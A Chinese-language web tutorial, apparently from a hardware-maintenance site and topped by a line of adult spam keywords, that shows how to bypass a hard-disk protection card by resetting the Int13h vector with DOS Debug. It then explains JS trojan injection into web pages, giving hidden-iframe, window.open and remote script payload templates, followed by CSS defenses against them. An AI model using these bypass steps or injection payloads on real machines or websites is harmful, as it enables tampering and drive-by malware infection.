久久久久无码精品,四川省少妇一级毛片,老老熟妇xxxxhd,人妻无码少妇一区二区

如何破解硬盤的保護(hù)

時(shí)間:2020-07-11 18:07:36 硬件維護(hù) 我要投稿

如何破解硬盤的保護(hù)

  如何破解硬盤的保護(hù)

  硬盤保護(hù)卡的工作原理

  硬盤保護(hù)卡是一種硬件芯片,插在主板上與硬盤的MBR一起協(xié)同工作,可以保護(hù)硬盤數(shù)據(jù)不被惡意修改和刪除,達(dá)到向硬盤中寫入數(shù)據(jù)在重新啟動(dòng)計(jì)算機(jī)后消除數(shù)據(jù)的目的。

  它的工作原理基于一種“BIOS映射地址轉(zhuǎn)移”的特殊技術(shù),說簡單點(diǎn)就是通過攔截BIOS原始的Int13h,使所有寫入硬盤的操作重新定位到其自身的中斷程序,從而實(shí)現(xiàn)對寫入硬盤的數(shù)據(jù)起到保護(hù)的作用。

  解除硬盤保護(hù)卡的保護(hù)功能

  上面我們明白了硬盤保護(hù)卡的工作原理,我們只要恢復(fù)Int13h原始的BIOS中斷量就可以解除破解硬盤保護(hù)卡。這需要借助于DOS下的Debug命令,通過它用手工方式找到Int13h的原始中斷向量值,填入中斷向量表即可。

  首先查找Int13h的入口。在純DOS的命令提示符下鍵入“Debug”并依次輸入如下命令:

  -a100

  -xor ax,ax

  -int 13

  -int3

  接著輸入“t”回車反復(fù)重復(fù)執(zhí)行,直到顯示地址形如“F000:xxxx”,記下這一地址,按“q”退出Debug狀態(tài)。這里假設(shè)找到的入口為F000:xxxx,在(0:13H*4)=0:4ch處填入這個(gè)地址,例如得到地址為F000:1234,再次運(yùn)行Debug,輸入如下命令:

  -e 0:4c 34 12 00F0

  -q

  這樣就把得到的原始入口填入Int13h的中斷向量表中了,這時(shí)候硬盤保護(hù)卡就被解除。需要說明的是,以上解除硬盤保護(hù)卡只對本次操作有效,每次重新啟動(dòng)系統(tǒng)都需要執(zhí)行這樣的操作。

  了解JS掛馬方式

  IFRAME掛馬方式比較早,相應(yīng)的預(yù)防措施也比較多,其中用CSS配合JS腳本進(jìn)行預(yù)防是主流方式?蛇@種預(yù)防方式也存在安全隱患,JS腳本也可以被用來掛馬,令人防不勝防。我們下面要介紹反擊JS掛馬的方法。

  文章要點(diǎn):了解JS掛馬方式

  文章難度:★★

  學(xué)習(xí)進(jìn)程:√ IFRAME掛馬

  √ JS掛馬

  CSS掛馬

  HNC網(wǎng)絡(luò)聯(lián)盟劉思楊:安全工程師,曾經(jīng)負(fù)責(zé)過許多單位的網(wǎng)絡(luò)安全

  許多人認(rèn)為,只要自己的服務(wù)器安全做得足夠好,建站程序補(bǔ)丁打得勤快,就能夠抵御住所有黑客的攻擊。這樣做的人肯定是非常多的,可為什么還是有許多網(wǎng)站被黑呢?

  一個(gè)很重要的原因,就是他們過于相信從第三方網(wǎng)站中下載的`整站程序,或者修改版的論壇程序等,而這些程序有些已經(jīng)被黑客做過手腳,已經(jīng)植入了后門,此時(shí)如果網(wǎng)站站長不熟悉如何查補(bǔ)漏洞,將無異于引狼入室。

  比較典型的一個(gè)例子是,曾經(jīng)非常出名的《易想多用戶商城 v2.1》(仿淘寶版),被許多黑客竄改過,多個(gè)關(guān)鍵頁面被植入了后門,然后到處提供下載,導(dǎo)致了許多使用該程序的網(wǎng)站被攻擊。因此在隱蔽手段掛馬橫行的今天,熟悉并掌握隱蔽的掛馬方式,是一個(gè)安全工程師必備的技能。

  JS掛馬溯源

  古人云:人算不如天算,天算不如暗算(小編:哪個(gè)古人這樣云過?)。當(dāng)IFRAME逐漸被黑客濫用的時(shí)候,有經(jīng)驗(yàn)的安全工程師也開始研究相應(yīng)的對策,一段時(shí)間內(nèi)各種阻止IFRAME掛馬的方法不斷涌現(xiàn),其中通用性較高的就是利用CSS配合JS腳本防御IFRAME掛馬。

  而黑客也發(fā)現(xiàn),很多網(wǎng)站都會(huì)讓網(wǎng)頁調(diào)用JS腳本來實(shí)現(xiàn)廣告等諸多特效,如果將木馬掛在JS腳本中,所有調(diào)用該JS腳本的網(wǎng)頁都等同于被掛上了木馬,對于需要肉雞群的黑客而言是一勞永逸,因此JS腳本掛馬逐漸開始被黑客應(yīng)用。

  小百科:JS腳本是JavaScript腳本語言的簡稱,它是一種面向?qū)ο蟮哪_本語言,目前廣泛用于動(dòng)態(tài)網(wǎng)頁的編程。需要提示大家的是,JavaScript和Java除了語法上有一些相似之處,以及都能夠當(dāng)作網(wǎng)頁的編程語言以外,兩者是完全不相干的。而JavaScript與Jscript也不同,Jscript是微軟為了迎戰(zhàn)JavaScript推出的腳本語言。

  雖然JavaScript作為給非程序人員的腳本語言向大眾推廣,但是JavaScript是一門具有豐富特性的語言,它有著和其他編程語言一樣的復(fù)雜性。實(shí)際上,你必須對JS有扎實(shí)的理解才能用它來編寫比較復(fù)雜的程序,作為一名安全工程師,掌握J(rèn)S腳本在工作中會(huì)有很大的幫助。

  掛馬原理一點(diǎn)通

  JS腳本掛馬對于黑客而言,可以說優(yōu)點(diǎn)多得數(shù)不過來,首先JS腳本在掛馬時(shí)可以直接將JS代碼寫在網(wǎng)頁中,也可以通過注入網(wǎng)頁,讓網(wǎng)站遠(yuǎn)程調(diào)取異地JS腳本。此外,JS掛馬插入Web頁面的方法有幾十種,絕對夠菜鳥們眼花繚亂,無從辨別木馬在何處。

  IFRAME掛馬相對于安全工程師而言,如同一個(gè)穿著鮮紅顏色外衣的劫匪,招搖而扎眼,很容易被發(fā)現(xiàn)。但是利用JS掛馬就意味著這個(gè)劫匪擁有了一張可以隨時(shí)變換的面孔,而且它還能夠隨時(shí)更換衣服。這樣的劫匪在安全工程師搜查時(shí),很容易蒙混過關(guān),導(dǎo)致木馬久殺不絕。

  JS掛馬攻防實(shí)錄

  攻現(xiàn)在最多見的JS掛馬方法有兩種,一種是直接將JavaScript腳本代碼寫在網(wǎng)頁中,當(dāng)訪問者在瀏覽網(wǎng)頁時(shí),惡意的掛馬腳本就會(huì)通過用戶的瀏覽器悄悄地打開網(wǎng)馬窗口,隱藏地運(yùn)行(圖1),這種方法使用的關(guān)鍵代碼如下:

  window.open("http:///木.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

  這種代碼往往很長,很容易被安全工程師發(fā)現(xiàn),而且沒有經(jīng)驗(yàn)的黑客也喜歡將“width”和“height=”參數(shù)設(shè)為“0”,但是設(shè)置為0后,可能會(huì)出現(xiàn)惡意代碼不運(yùn)行的情況。

  另外一種JS掛馬方式是,黑客先將掛馬腳本代碼“document.write('')”,寫入Windows中的寫字板另存為后綴為.js的腳本文件,并上傳到自己指定的網(wǎng)址。這時(shí)黑客只需要在受害者的網(wǎng)站中寫入:

 。約cript src="http:///木馬腳本.js"></script>

  或者

  document.write("<div style='display:none'>")

  document.write("<iframe src="網(wǎng)頁木馬地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>")

  document.write("</div>")

  就成功地將木馬掛到了對方的網(wǎng)頁中了。

  小提示:黑客還可以根據(jù)情況隨機(jī)變換插入的JS掛馬方法,例如黑客有可能會(huì)將腳本寫為:<div style="behaviour: url(http:///木馬腳本.js);">或者<if rame src="vbscript:[掛馬腳本]">等。

  防第一種JS掛馬方式,不方便,用得非常少,而第二種JS掛馬方式才是當(dāng)前主流的,所以我們主要針對它進(jìn)行防御。方法就是阻止Src請求的異地外域的JS腳本,代碼如下:

  iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');}

  script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木馬被成功隔離!'):'');}

  不過這種方法的缺點(diǎn)就是網(wǎng)站的訪問者將不能看到被掛了JS木馬的相關(guān)網(wǎng)頁(圖2)。

  所以我們?yōu)榘踩こ處熖峁┝艘欢慰梢灾兄笿S腳本運(yùn)行的CSS代碼,這段代碼會(huì)讓異地外域的JS文件在使用document.write()時(shí),被document.close()強(qiáng)制關(guān)閉。這個(gè)時(shí)侯JS掛馬的內(nèi)容往往還沒有來得及寫完,只有部分被強(qiáng)制輸出了,Writer后面的內(nèi)容再不會(huì)被寫入訪問者的電腦中,從而起到防范JS腳本掛馬的作用。

 。紅itle>讓JS掛馬中止的CSS代碼</title>

  <style type="text/css" id="shudoo">

  /*<![CDATA[*/

  if rame{mdy1:expression(this.src='about:blank',this.outerHTML='');}

  script{mzm2:expression((this.src.indexOf('http')==0)?document.close():'');}

  /*]]>*/

  我們雖然能夠巧妙地利用CSS代碼防范IFRAME和JS腳本掛馬,但是為什么網(wǎng)頁掛馬還是層出不窮?這恐怕就要說一說CSS掛馬了……

【如何破解硬盤的保護(hù)】相關(guān)文章:

1.如何破解月亮球

2.保護(hù)硬盤隱私的方法

3.保護(hù)硬盤的小知識(shí)

4.如何保養(yǎng)電腦的硬盤

5.保護(hù)硬盤的正確方法介紹

6.介紹APS硬盤的保護(hù)技術(shù)

7.電腦硬盤如何保養(yǎng)

8.電腦硬盤如何分區(qū)